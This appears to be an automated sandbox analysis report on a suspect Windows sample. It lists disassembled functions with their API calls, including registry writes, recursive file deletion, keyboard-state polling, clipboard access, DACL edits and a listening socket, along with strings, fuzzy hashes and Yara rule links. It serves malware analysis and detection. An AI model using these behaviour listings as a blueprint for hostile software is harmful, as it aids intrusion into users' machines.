                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: 3992cb3fa4dc5e4dbca50eb07d72cba9933735144f8dc23e07de16c7cbd91524
                                                    • Instruction ID: a0cb9307e3b6ec923825ccd1def7d82394c2310900bbbe30c10265b04802a405
                                                    • Opcode Fuzzy Hash: 3992cb3fa4dc5e4dbca50eb07d72cba9933735144f8dc23e07de16c7cbd91524
                                                    • Instruction Fuzzy Hash: 465191392042016BD301AF60EC85FAF77A8AF89B00F11457EF555D62A1DF74ED098B6A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00440AE2, Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440BDE
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0044F910,00000000,?,00000000,?,?), ref: 00440C4C
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00440C94
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00440D1D
                                                    • RegCloseKey.ADVAPI32(?), ref: 0044103D
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044104A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: 2588b82e21df43f28b429d7311f27c5a177cc7839ad39164c126fa296ba778ee
                                                    • Instruction ID: 0f531c91b705ab0f30893a502f3cd797eaa08c1a80924ff5ad534fc9fd0d1319
                                                    • Opcode Fuzzy Hash: 2588b82e21df43f28b429d7311f27c5a177cc7839ad39164c126fa296ba778ee
                                                    • Instruction Fuzzy Hash: D10267752006119FDB15EF25C885F2AB7E5EF88714F05885EF98A9B3A2CB34EC41CB85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042F200, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 125fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000003,?,74B061D0,?,00000000), ref: 0042F221
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0042F25F
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0042F279
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0042F291
                                                    • FindClose.KERNEL32(00000000), ref: 0042F29C
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0042F2B8
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042F308
                                                    • SetCurrentDirectoryW.KERNEL32(0047A5A0), ref: 0042F326
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042F330
                                                    • FindClose.KERNEL32(00000000), ref: 0042F33D
                                                    • FindClose.KERNEL32(00000000), ref: 0042F34F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1409584000-438819550
                                                    • Opcode ID: 38bb13f296d2d75c7e60d7128eb84932166300298c033bbdbb48db7523b947f0
                                                    • Instruction ID: e90f4d91cea36719b5217bf317e0fb1994b7732cf3e7d8013bbe0f8f80b949e2
                                                    • Opcode Fuzzy Hash: 38bb13f296d2d75c7e60d7128eb84932166300298c033bbdbb48db7523b947f0
                                                    • Instruction Fuzzy Hash: 9B31C3766011287ADB10DBB0FC48EDF77BCEB4A361F9041B7F804D2090DA39DA498B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003D6843, Relevance: 20.9, Strings: 16, Instructions: 926COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa=$PJF$UCP)$UTF)$UTF16)
                                                    • API String ID: 0-651847768
                                                    • Opcode ID: 35717303aae0deb0ddc003f50536b68e4428757cacaafa4ecafd69d2c149d5da
                                                    • Instruction ID: a19dd64b2fdb76d972ec1ed79768dabc524cf47716543ae7e766f67deff17718
                                                    • Opcode Fuzzy Hash: 35717303aae0deb0ddc003f50536b68e4428757cacaafa4ecafd69d2c149d5da
                                                    • Instruction Fuzzy Hash: DD72B2B6E002199BDB25CF68E841BEEB7B5FF44310F24816BE519EB390D7349981CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004181F7, Relevance: 19.7, APIs: 13, Instructions: 186memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041874A: GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 00418766
                                                      • Part of subcall function 0041874A: GetLastError.KERNEL32(?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418770
                                                      • Part of subcall function 0041874A: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,00418427,?,?,?), ref: 0041877F
                                                      • Part of subcall function 0041874A: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418786
                                                      • Part of subcall function 0041874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041879D
                                                      • Part of subcall function 004187E7: GetProcessHeap.KERNEL32(00000008,?,?,?,?,0041843D,?), ref: 004187F3
                                                      • Part of subcall function 004187E7: HeapAlloc.KERNEL32(00000000,?,?,?,0041843D,?), ref: 004187FA
                                                      • Part of subcall function 004187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,?,?,?,?,0041843D,?), ref: 0041880B
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,000F01FF,?,?,00000000,00000000,00000000,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 0041825B
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?,?,?,?,?,?,?,?,?,?,004189C8), ref: 0041828F
                                                    • GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 004182A0
                                                    • GetAce.ADVAPI32(?,00000000,00000400,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000), ref: 004182DD
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000400,?), ref: 004182F9
                                                    • GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 00418316
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?), ref: 00418325
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 0041832C
                                                    • GetLengthSid.ADVAPI32(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000), ref: 0041834D
                                                    • CopySid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 00418354
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00418385
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004189C8), ref: 004183AB
                                                    • SetUserObjectSecurity.USER32 ref: 004183BF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 1795222879-0
                                                    • Opcode ID: 69dd075ab406b645077ceb36d07da47048181deec2292b0eb90d093ddc5d84ff
                                                    • Instruction ID: cef3ebe969771be793faef5fe71dfa60d3755a554138fc7b781b392dc81443ab
                                                    • Opcode Fuzzy Hash: 69dd075ab406b645077ceb36d07da47048181deec2292b0eb90d093ddc5d84ff
                                                    • Instruction Fuzzy Hash: 89617A75900109AFDF04DFA0DC45EEEBBB8FF45704F04852EF821A6291DB3A9A55CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042F35D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74B061D0,?,00000000), ref: 0042F37E
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0042F3D9
                                                    • FindClose.KERNEL32(00000000), ref: 0042F3E4
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0042F400
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042F450
                                                    • SetCurrentDirectoryW.KERNEL32(0047A5A0), ref: 0042F46E
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042F478
                                                    • FindClose.KERNEL32(00000000), ref: 0042F485
                                                    • FindClose.KERNEL32(00000000), ref: 0042F497
                                                      • Part of subcall function 004245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74B5F8A0,00000000,00000000,?,0042F3C6,?), ref: 004245DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 2640511053-438819550
                                                    • Opcode ID: 9791e495a929e18695b96bfacf3d966cdf42677b1b1683e62ee9cb13ba92727e
                                                    • Instruction ID: f25251dc56f0a7d39981cd0706150d0b54d079f1be5a3d185928ed3156893e99
                                                    • Opcode Fuzzy Hash: 9791e495a929e18695b96bfacf3d966cdf42677b1b1683e62ee9cb13ba92727e
                                                    • Instruction Fuzzy Hash: AB3106722015296EDB10EBA0FC88ADF777CDF49365F900177E80092190D779DA48CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00440665, Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00440038,?,?), ref: 004410BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440737
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004407D6
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0044086E
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00440AAD
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00440ABA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper
                                                    • String ID:
                                                    • API String ID: 1724414362-0
                                                    • Opcode ID: 755ef06ec4a9110d08dffd90c4f1c7cd72be55ce49abe804ebaa0439ddeaa2d1
                                                    • Instruction ID: 43d886dab9b0ab83a317475e5fd3ebd35283b5d0f7fef73c2de98d664a20fd00
                                                    • Opcode Fuzzy Hash: 755ef06ec4a9110d08dffd90c4f1c7cd72be55ce49abe804ebaa0439ddeaa2d1
                                                    • Instruction Fuzzy Hash: 08E17D31204310AFDB15DF25C884E2BBBE8EF89714B04896EF54ADB262DB34ED15CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00420219, Relevance: 16.6, APIs: 11, Instructions: 124keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,?,?), ref: 00420241
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 004202C2
                                                    • GetKeyState.USER32(000000A0), ref: 004202DD
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004202F7
                                                    • GetKeyState.USER32(000000A1), ref: 0042030C
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00420324
                                                    • GetKeyState.USER32(00000011), ref: 00420336
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0042034E
                                                    • GetKeyState.USER32(00000012), ref: 00420360
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00420378
                                                    • GetKeyState.USER32(0000005B), ref: 0042038A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a0f64a5a66eda95efad4f80b9e757c37031f0c555c77c8c192742392a7551c0b
                                                    • Instruction ID: db03ad31f4edfaabef3f826b3969f9c1265a830c6307ee658c8e32ef25324f7e
                                                    • Opcode Fuzzy Hash: a0f64a5a66eda95efad4f80b9e757c37031f0c555c77c8c192742392a7551c0b
                                                    • Instruction Fuzzy Hash: 484189347047D9AEFF318760A8087A7BEE0AB12344F84409BD9C5566C3D7A95DC887B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C9C7, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 280timefileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0042C9F8
                                                    • FindClose.KERNEL32(00000000), ref: 0042CA4C
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042CA71
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042CA88
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042CAAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FileTime$FindLocal$CloseFirstSystem
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3238362701-2428617273
                                                    • Opcode ID: 8f1f2293bdbc450b9f6f93a48961c00f8ce83f40112c99a7f4ea24193e87706e
                                                    • Instruction ID: 122a44d8b13851c5cdcd5daa9441e8507ca6f991cbe620731f141d64702f28ae
                                                    • Opcode Fuzzy Hash: 8f1f2293bdbc450b9f6f93a48961c00f8ce83f40112c99a7f4ea24193e87706e
                                                    • Instruction Fuzzy Hash: 8FA12FB6508354ABC701EB55C885EAFB7ECAF94700F40492EB585CB191EB74EE08CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003D710E, Relevance: 15.2, Strings: 8, Instructions: 5223COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0wG$DEFINE$Oa=$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                    • API String ID: 0-2749369646
                                                    • Opcode ID: 069ccd89eb5e2f9dea4346e66749663c0d63829cb36772792d56478798229329
                                                    • Instruction ID: 0d3fcc727cdcb2aee43713306038a066e1982ac92c8914dbd01a816fe316c254
                                                    • Opcode Fuzzy Hash: 069ccd89eb5e2f9dea4346e66749663c0d63829cb36772792d56478798229329
                                                    • Instruction Fuzzy Hash: 6193AE72A042199FDB24CF98D981AEDB7B1FF48310F25816BE945EB380E7749E81CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00423A2B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 174fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                      • Part of subcall function 00424CD3: GetFileAttributesW.KERNELBASE(?,004253F4), ref: 00424CD4
                                                    • FindFirstFileW.KERNEL32(?,?,00000003,?,?), ref: 00423ADF
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00423B87
                                                    • MoveFileW.KERNEL32(?,?), ref: 00423B9A
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00423BB7
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00423BD9
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00423BF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: b010233bacc9f7e2ffcfc257f6d27651a7b3302167502841751ef8512d4102ea
                                                    • Instruction ID: f4e5eeb38e9ce78b285971a0cae083b96a096d1bf68519504f276765bbd00555
                                                    • Opcode Fuzzy Hash: b010233bacc9f7e2ffcfc257f6d27651a7b3302167502841751ef8512d4102ea
                                                    • Instruction Fuzzy Hash: B151803190115C9ACB06EFA1ED92DEEB778AF15301F6441AAF441BA092DF296F0DCB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00436596, Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004365EF
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004365FE
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 0043661A
                                                    • listen.WSOCK32(00000000,00000005), ref: 00436629
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436643
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00436657
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 316ecb33b7d99a4efa1522346fef756311a3f1997a4aa919219d14be4611985f
                                                    • Instruction ID: a7965cace6a1f5721eb44488b40a8be93a9c56d64623fbb4bf7e52f8eb9ef707
                                                    • Opcode Fuzzy Hash: 316ecb33b7d99a4efa1522346fef756311a3f1997a4aa919219d14be4611985f
                                                    • Instruction Fuzzy Hash: CF21C534200201AFCB00AF24C849F6EB7A9EF49310F12816EE916EB3D1CB74AD058B55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042F65E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122filesleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0042F6AB
                                                    • Sleep.KERNEL32(0000000A), ref: 0042F6DB
                                                    • FindNextFileW.KERNEL32(?,?), ref: 0042F7A8
                                                    • FindClose.KERNEL32(00000000), ref: 0042F7BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextSleep
                                                    • String ID: *.*
                                                    • API String ID: 1749430636-438819550
                                                    • Opcode ID: 3df32bfa0565d27698363afa3f661226c17d699b780752e1b4f99ab0b206c5ad
                                                    • Instruction ID: aa7c2bddb959a731101f2135e6c16ecc9bdbef771e01fe499fefd7fc69e93f74
                                                    • Opcode Fuzzy Hash: 3df32bfa0565d27698363afa3f661226c17d699b780752e1b4f99ab0b206c5ad
                                                    • Instruction Fuzzy Hash: 24418F75A0021A9FDB11DF60DC85EEE7BB4FF05310F94457AE814A6290DB349E48CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C1287, Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 003C19FA
                                                    • GetSysColor.USER32(0000000F), ref: 003C1A4E
                                                    • SetBkColor.GDI32(?,00000000), ref: 003C1A61
                                                      • Part of subcall function 003C1290: DefDlgProcW.USER32(?,00000020,?), ref: 003C12D8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 0b8ad611f67e694a8bb7215c51b1e2574a407bff9b7badf5f4cc883b39d2fd0e
                                                    • Instruction ID: 742037d6057a5fed894b202c108404219d17ff1789be82ab8ee9f94c2d1f78cd
                                                    • Opcode Fuzzy Hash: 0b8ad611f67e694a8bb7215c51b1e2574a407bff9b7badf5f4cc883b39d2fd0e
                                                    • Instruction Fuzzy Hash: 73A177B4102448BAEA2BAB2A8C84F7F659CDB43385F16051EF503D6593CF28DC01B3B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F418A, Relevance: 7.8, APIs: 5, Instructions: 274timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003E9E4B: EnterCriticalSection.KERNEL32(?,?,003E9CBC,0000000D), ref: 003E9E76
                                                    • _strlen.LIBCMT ref: 003F4251
                                                    • _strlen.LIBCMT ref: 003F4276
                                                      • Part of subcall function 003E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9C64,00000000,003E8D6D,003E59D3,?,?,003E1013,?), ref: 003E2FA9
                                                      • Part of subcall function 003E2F95: GetLastError.KERNEL32(00000000,?,003E9C64,00000000,003E8D6D,003E59D3,?,?,003E1013,?), ref: 003E2FBB
                                                    • GetTimeZoneInformation.KERNEL32(00484AF8,?,?,?,?,?,0047C070,00000030), ref: 003F42B9
                                                    • WideCharToMultiByte.KERNEL32(?,?,00484AFC,000000FF,?,0000003F,?,?), ref: 003F4332
                                                    • WideCharToMultiByte.KERNEL32(?,?,00484B50,000000FF,FFFFFFFE,0000003F,?,?,?,00484AFC,000000FF,?,0000003F,?,?), ref: 003F436B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
